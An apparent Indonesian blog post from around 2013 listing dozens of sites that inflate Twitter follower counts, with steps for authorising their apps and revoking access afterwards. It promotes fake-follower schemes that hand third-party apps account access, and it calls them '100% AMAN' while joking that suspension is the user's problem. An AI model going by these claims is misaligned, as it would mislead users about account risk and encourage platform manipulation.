Yuk langsung aja ngga usah banyak basa-basi, buat agan sista yang hobi main twitter, pasti seneng dong kalo punya banyak followersnya (walau ngga kenal siapa tuh sih followers :D wkwk).
om
Nih gue bagiin Link penambah followers masal (terlengkap) :
sebelum mulai, pastikan dulu ya udah pada punya twitter ! #loh wkwk, "Hah ?? belom punya ??? hari gene belom punya twitter ??? *HEiUH hahaha. yaudah buat dulu DISINI. udah kan ?? yuk langsung ke acara intinya".
Ini dia kumpulan link auto followers / cheat followers / penambah followers 2013 :D
karena banyak request, jadi gue klasifikasiin lagi ya followers asal negara-negaranya
Hampir Semua Followers yang di dapat dari link ini berasal Luar Negeri;
- www.bestfollowers.org
- www.bulkfollowers.co
- www.followport.us
- www.kingfollow.net
- www.livefollowers.us
- www.morefollowers.me
- www.newfollowers.me
- http://www.bigfollow.net/
- www.socialexchanger.us
- www.gainfollowers.info
- http://www.flyfollowers.com/
- http://www.followix.info/
- www.getnewfollowers.us
- http://www.followcrazy.us/
- www.takipcikazan.me
- http://spreadyourtweets.biz/
- www.naturalfollowers.com/
- www.freefollowers.me/
- http://www.followpoint.us/
- http://www.twitterfollowers.mobi/
- http://www.jetfollowers.com/
- http://www.afollowers.com/
- http://www.500followers.com/
- http://www.30followers.com/
- http://www.300followers.com/
- http://hitfollow.info/
- http://plusfollower.info/
- http://newfollow.info/
- http://followback.info/
- http://letgetmorefollowers.info/
Kalo Yang ini buatan Orang Indonesia, jadi Hampir semua followersnya orang Indonesia Sob ;;) Silahkan di Sedot;
- http://fllwrsgrats.blogspot.ca
- http://fllwrsgrats.blogspot.mx/
- http://followersrealhumans.blogspot.com/
- http://realfollowers.us.to/
- http://followerion.blogspot.com/
- http://www.sejutafollowers.tk/
- http://follow-twet.blogspot.com/
- http://gfgratisfollower.blogspot.com/
- http://sporexer.mobi/
- http://falling-into-silence.blogspot.com/
- http://mild-design.blogspot.com/
- http://jkt48follow.tk/
- http://ambilfollower.blogspot.com/
- http://follow-bae.blogspot.com/
- http://followersmasal.blogspot.com/
- http://zanfollowers.tk/
- http://yukprom.blogspot.com/
- http://wowfollowers2.tk/
- www.tukarfollowers.com/
- http://followgan.tk/
- http://idlsc.blogspot.com/
- http://autofollowersgratis.blogspot.com/
- http://gfsatu.blogspot.com/
- http://followerils.blogspot.com/
Oke, udah banyak banget tuh kan linknya :D
kalo belum tau juga cara gunainnya, nih tutornya !
- Buka akun twitter kamu
- Klik salah satu link yg diatas (ikuti cara main web tersebut) * Free kok 100% FREE.
- Liat followers kamu ** WOOOOWWW nambah banyak kan ? wkwkwk
- ***** kalo mau berhenti gunain auto followers diatas, tinggal ke - Pengaturan - Aplikasi - Cabut akses aplikasi tersebut. (Saran gue sih, setelah di gunain langsung cabut). #mudah kan ? hahaha
Udah cukup segitu aja ya ;)
*Semua Aplikasi Diatas 100% AMAN (SNI: Suspended Nanggung sendirI ) =D wkwk
*Jika Ingin Membuang Following yang tidak Memfollow Back kamu (Bisa Sekaligus Unfoll Ratusan Orang -aplikasi ini udah dirancang sedemikian rupa- Jadi tidak perlu khawatir akan bahaya Suspend)
Admin
Subscribe to:
Posts (Atom)